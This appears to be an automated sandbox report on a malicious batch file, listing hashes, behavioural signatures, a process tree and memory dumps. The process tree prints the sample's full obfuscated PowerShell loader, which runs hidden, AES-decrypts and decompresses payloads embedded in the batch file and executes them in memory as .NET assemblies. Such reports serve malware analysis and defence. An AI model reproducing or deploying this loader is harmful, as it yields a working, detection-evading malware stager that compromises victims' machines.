9ab3f1afc5255582729325d13f790dd151b90ccd3f13170c4e0b0dd51dc40142

General

Target

59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
Size

6.9MB
MD5

a65e873839228c5b453d6effa5d14d16
SHA1

40be429e0e6b41061f3291d10e720eaebf32eda1
SHA256

59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA512

84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850
SSDEEP

24576:ClNzlllllllllllllllllllllllllllllllllllllllllllllllllllllllllllg:/

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2884 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2884 powershell.exe

pid	process
2884	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1688 wrote to memory of 2252	1688	cmd.exe	cmd.exe
PID 1688 wrote to memory of 2252	1688	cmd.exe	cmd.exe
PID 1688 wrote to memory of 2252	1688	cmd.exe	cmd.exe
PID 2252 wrote to memory of 1292	2252	cmd.exe	cmd.exe
PID 2252 wrote to memory of 1292	2252	cmd.exe	cmd.exe
PID 2252 wrote to memory of 1292	2252	cmd.exe	cmd.exe
PID 2252 wrote to memory of 2884	2252	cmd.exe	powershell.exe
PID 2252 wrote to memory of 2884	2252	cmd.exe	powershell.exe
PID 2252 wrote to memory of 2884	2252	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
3⤵
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2884-4-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2884-5-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2884-6-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-7-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-8-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-9-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-10-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-11-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-12-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-13-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-14-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2884-15-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads